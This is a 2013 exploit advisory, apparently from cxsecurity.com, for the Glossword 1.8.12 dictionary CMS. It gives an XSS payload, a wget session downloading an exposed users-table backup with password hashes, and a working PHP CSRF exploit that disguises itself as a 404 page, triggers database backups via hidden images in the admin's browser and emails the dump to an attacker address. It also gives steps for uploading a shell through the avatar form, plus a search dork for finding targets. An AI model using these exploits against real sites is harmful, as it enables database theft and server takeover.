Glossword 1.8.12 XSS & Database Backup Disclosure & CSRF & Shell upload

2013.02.04
Credit: AkaStep
Risk: High
Local: No
Remote: Yes
CVE: N/A

=================================================== Vulnerable Software: Glossword 1.8.12 Tested version: Glossword 1.8.12 Download: http://sourceforge.net/projects/glossword/files/glossword/1.8.12/ Vulns: XSS && Database Backup Disclosure && CSRF && Shell upload. Dork: Powered by Glossword 1.8.12 =================================================== Tested On: Debian squeeze 6.0.6 Server version: Apache/2.2.16 (Debian) Apache traffic server 3.2.0 MYSQL: 5.1.66-0+squeeze1 PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59) Copyright (c) 1997-2009 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH =================================================== About vulns: XSS http://hacker1.own/glosslatest/glossword/1.8/gw_admin.php?a="><script>alert(1);</script>&t=settings =================================================== Database Backup disclosure: root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# grep 'umask' /etc/pam.d/common-session session optional pam_umask.so umask=0067 root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# umask -S u=rwx,g=x,o= # NOTE 1: Notice database backups chmod'ed to 777 by script# # NOTICE 2: BELOW database backups is accessible via HTTP REQUESTS # root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# ls -liash total 1.1M 65345 4.0K drwxrwxrwx 2 hacker1user hacker1user 4.0K Feb 3 08:41 . 60499 4.0K drwxr-xr-x 3 hacker1user hacker1user 4.0K Feb 3 08:40 .. 65347 68K -rwxrwxrwx 1 hacker1user hacker1user 64K Feb 3 08:40 backup_gwnew_abbr_phrase.sql 65346 12K -rwxrwxrwx 1 hacker1user hacker1user 9.8K Feb 3 08:40 backup_gwnew_abbr.sql 65367 4.0K -rwxrwxrwx 1 hacker1user hacker1user 402 Feb 3 08:40 backup_gwnew_auth_restore.sql 65359 4.0K -rwxrwxrwx 1 hacker1user hacker1user 304 Feb 3 08:40 backup_gwnew_captcha.sql 65350 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.3K Feb 3 08:40 backup_gwnew_component_actions.sql 65349 8.0K -rwxrwxrwx 1 hacker1user hacker1user 6.2K Feb 3 08:40 backup_gwnew_component_map.sql 65348 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.7K Feb 3 08:40 backup_gwnew_component.sql 65365 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.5K Feb 3 08:40 backup_gwnew_custom_az_profiles.sql 65364 36K -rwxrwxrwx 1 hacker1user hacker1user 33K Feb 3 08:40 backup_gwnew_custom_az.sql 65368 240K -rwxrwxrwx 1 hacker1user hacker1user 234K Feb 3 08:41 backup_gwnew_dict_example.sql 65351 4.0K -rwxrwxrwx 1 hacker1user hacker1user 3.6K Feb 3 08:40 backup_gwnew_dict.sql 65374 268K -rwxrwxrwx 1 hacker1user hacker1user 263K Feb 3 08:41 backup_gwnew_history_terms.sql 65363 4.0K -rwxrwxrwx 1 hacker1user hacker1user 2.6K Feb 3 08:40 backup_gwnew_import_sessions.sql 65369 4.0K -rwxrwxrwx 1 hacker1user hacker1user 326 Feb 3 08:41 backup_gwnew_map_user_to_dict.sql 65370 24K -rwxrwxrwx 1 hacker1user hacker1user 23K Feb 3 08:41 backup_gwnew_map_user_to_term.sql 65353 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.3K Feb 3 08:40 backup_gwnew_pages_phrase.sql 65352 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.1K Feb 3 08:40 backup_gwnew_pages.sql 65354 4.0K -rwxrwxrwx 1 hacker1user hacker1user 485 Feb 3 08:40 backup_gwnew_search_results.sql 65355 4.0K -rwxrwxrwx 1 hacker1user hacker1user 538 Feb 3 08:40 backup_gwnew_sessions.sql 65356 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.2K Feb 3 08:40 backup_gwnew_settings.sql 65357 4.0K -rwxrwxrwx 1 hacker1user hacker1user 321 Feb 3 08:40 backup_gwnew_stat_dict.sql 65358 4.0K -rwxrwxrwx 1 hacker1user hacker1user 599 Feb 3 08:40 backup_gwnew_stat_search.sql 65373 8.0K -rwxrwxrwx 1 hacker1user hacker1user 8.0K Feb 3 08:41 backup_gwnew_theme_group.sql 65371 260K -rwxrwxrwx 1 hacker1user hacker1user 256K Feb 3 08:41 backup_gwnew_theme_settings.sql 65372 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.5K Feb 3 08:41 backup_gwnew_theme.sql 65361 4.0K -rwxrwxrwx 1 hacker1user hacker1user 908 Feb 3 08:40 backup_gwnew_topics_phrase.sql 65360 4.0K -rwxrwxrwx 1 hacker1user hacker1user 761 Feb 3 08:40 backup_gwnew_topics.sql 65362 4.0K -rwxrwxrwx 1 hacker1user hacker1user 3.2K Feb 3 08:40 backup_gwnew_users.sql 65366 4.0K -rwxrwxrwx 1 hacker1user hacker1user 949 Feb 3 08:40 backup_gwnew_virtual_keyboard.sql 65375 32K -rwxrwxrwx 1 hacker1user hacker1user 29K Feb 3 09:03 backup_gwnew_wordlist.sql 65376 48K -rwxrwxrwx 1 hacker1user hacker1user 46K Feb 3 08:41 backup_gwnew_wordmap.sql root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# cd /tmp root@debian:/tmp# wget --user-agent="BACKUP DISCLOSURE EXAMPLE" http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gwnew_users.sql && cat backup_gwnew_users.sql --2013-02-03 09:13:17-- http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gwnew_users.sql Resolving hacker1.own... 127.0.0.1 Connecting to hacker1.own|127.0.0.1|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 3184 (3.1K) [text/plain] Saving to: &#8220;backup_gwnew_users.sql&#8221; 100%[======================================================================================>] 3,184 --.-K/s in 0s 2013-02-03 09:13:17 (13.7 MB/s) - &#8220;backup_gwnew_users.sql&#8221; saved [3184/3184] SET NAMES 'utf8'; DROP TABLE IF EXISTS `gwnew_users`; CREATE TABLE `gwnew_users` ( `id_user` int(10) unsigned NOT NULL AUTO_INCREMENT, `login` varbinary(128) NOT NULL, `password` char(32) NOT NULL, `is_active` tinyint(1) unsigned NOT NULL DEFAULT '1', `is_multiple` tinyint(1) unsigned NOT NULL DEFAULT '0', `is_show_contact` tinyint(1) unsigned NOT NULL DEFAULT '1', `date_reg` int(10) unsigned NOT NULL DEFAULT '0', `date_login` int(10) unsigned NOT NULL DEFAULT '0', `int_items` int(10) unsigned NOT NULL DEFAULT '0', `user_fname` varbinary(64) NOT NULL, `user_sname` varbinary(64) NOT NULL, `user_email` varchar(255) NOT NULL, `user_perm` blob NOT NULL, `user_settings` blob NOT NULL, PRIMARY KEY (`id_user`) ) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8; INSERT INTO `gwnew_users` VALUES ('1','guest','084e0343a0486ff05530df6c705c8bb4','1','0','0','0','1359897241','1','Guest','','guest@localhost.tld','a:0:{}',0x613a343a7b733a363a226c6f63616c65223b733a333a22656e67223b733a383a226c6f636174696f6e223b733a303a22223b733a31303a22676d745f6f6666736574223b733a313a2230223b733a31323a2264696374696f6e6172696573223b613a303a7b7d7d); INSERT INTO `gwnew_users` VALUES ('2','admin','01a8e7efac66ec52b417af55940e4719','1','0','1','1359915020','1359898817','23','Admin User',' ','admin@hacker1.own','a:16:{s:8:\"IS-EMAIL\";i:1;s:8:\"IS-LOGIN\";i:1;s:11:\"IS-PASSWORD\";i:1;s:8:\"IS-USERS\";i:1;s:13:\"IS-TOPICS-OWN\";i:1;s:9:\"IS-TOPICS\";i:1;s:12:\"IS-DICTS-OWN\";i:1;s:8:\"IS-DICTS\";i:1;s:12:\"IS-TERMS-OWN\";i:1;s:8:\"IS-TERMS\";i:1;s:15:\"IS-TERMS-IMPORT\";i:1;s:15:\"IS-TERMS-EXPORT\";i:1;s:13:\"IS-CPAGES-OWN\";i:1;s:9:\"IS-CPAGES\";i:1;s:15:\"IS-SYS-SETTINGS\";i:1;s:10:\"IS-SYS-MNT\";i:1;}',0x613a31393a7b733a31303a226176617461725f696d67223b733a31373a22313335393839373436315f73312e706870223b733a31323a226176617461725f696d675f79223b4e3b733a31323a226176617461725f696d675f78223b4e3b733a31303a22676d745f6f6666736574223b733a313a2233223b733a393a2269735f68746d6c6564223b733a313a2231223b733a31333a2269735f7573655f617661746172223b693a303b733a31313a226c6f63616c655f6e616d65223b733a373a22656e2d75746638223b733a383a226c6f636174696f6e223b733a303a22223b733a31313a2276697375616c7468656d65223b733a393a2267775f73696c766572223b733a31323a2264696374696f6e6172696573223b613a303a7b7d733a363a2269735f647374223b693a303b733a31313a22646174655f666f726d6174223b733a31333a2246206a2c20592c20673a692061223b733a31333a22696d706f72745f666f726d6174223b733a333a22637376223b733a32313a22696d706f72745f69735f636865636b5f6578697374223b693a303b733a31393a22696d706f72745f69735f6f7665727772697465223b693a303b733a32323a22696d706f72745f69735f7370656369616c6368617273223b693a303b733a32303a22696d706f72745f69735f77686974657370616365223b693a303b733a32313a22696d706f72745f69735f636f6e766572745f657363223b693a303b733a32303a22696d706f72745f69735f726561645f6669727374223b693a303b7d); INSERT INTO `gwnew_users` VALUES ('3','test','098f6bcd4621d373cade4e832627b4f6','1','0','1','1359898749','0','0','','','','a:0:{}',0x613a333a7b733a383a226c6f636174696f6e223b733a303a22223b733a31313a226c6f63616c655f6e616d65223b733a373a22656e2d75746638223b733a31323a2264696374696f6e6172696573223b613a303a7b7d7d);root@debian:/tmp# In this example: backup_gwnew_users.sql gwnew_ is my custom table prefix.In fact while installing script it is = gw_ Feel free to create your own bruteforcer: Format is: sql_backup_2013-02Feb-03/backup_{TABLE_PREFIX}_users.sql Also table prefix is not panacea ANYMORE. If Directory index is not forbidden on remote site/server you can see whole : site.tld/gw_export/sql_backup_2013-02Feb-03/ directory structure and you can download it in that way. Ok this is not end. Theris another vector of exploitation using CSRF vulnerability. Here we go (CSRF+database dump stealer) Simply trick the logged in admin to visit malicious page. If the attack successfull it will silenty @mail to you victim's database. ==============EXPLOIT BEGINS===================== <?php error_reporting(0); //echo '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d'); /* http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/ */ //exit; define("TARGETSITE",'http://hacker1.own/glosslatest/glossword/1.8/'); define("HACKERMAIL",'hacker@g00glemail.tld'); define("STANDARDTABLEPREFIX",'gw_'); header('Status: 404 Not found!'); echo '<h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port ' . $_SERVER['SERVER_PORT'] . '</address>' . str_repeat(PHP_EOL,500); for($i=1;$i<8;$i++) { echo '<img src="' . TARGETSITE . '/gw_admin.php?a=maintenance&t=settings&w1=8&w2=' . $i . '&w3=" heigth="0" width="0" />' .PHP_EOL; } $data=TARGETSITE . '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d') . '/backup_' . STANDARDTABLEPREFIX .'users.sql'; //echo TARGETSITE . '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d') . '/backup_' . STANDARDTABLEPREFIX .'users.sql';exit; //@mail(HACKERMAIL,'Hello xDuMpS!','CHKOUT' . TARGETSITE . /gw_temp/gw_export/sql_backup_'. date('Y-mM-d') . $s=file_get_contents($data); /*uncomment if you want to save on your server # file_put_contents(md5(rand(1,1000)) . '.txt',$s);*/ @mail(HACKERMAIL,'Hello xDuMpS!','CHKOUT' . htmlspecialchars($data) . PHP_EOL . htmlspecialchars($s) .PHP_EOL); exit; ?> ================EXPLOIT ENDS HERE====================== Ok now about shell upload vulnerability (requires administrative access to site) After gain access to admin panel (in eg via XSS or using backup disclosure) Go to: http://site.tld/gw_admin.php?a=edit-own&t=users Upload your shell using: Avatar settings tab. Don't bother about: (*The following file types are allowed: jpg, png*) because it is wrong information. Trace it like this,access it and travel xD http://s006.radikal.ru/i215/1302/27/d4b52ad33b39.png Backup image: http://oi47.tinypic.com/crsde.jpg ================================================ KUDOSSSSSSS ================================================ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers Also special thanks to: ottoman38 & HERO_AZE ================================================ /AkaStep

References:

http://sourceforge.net/projects/glossword/files/glossword/1.8.12/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top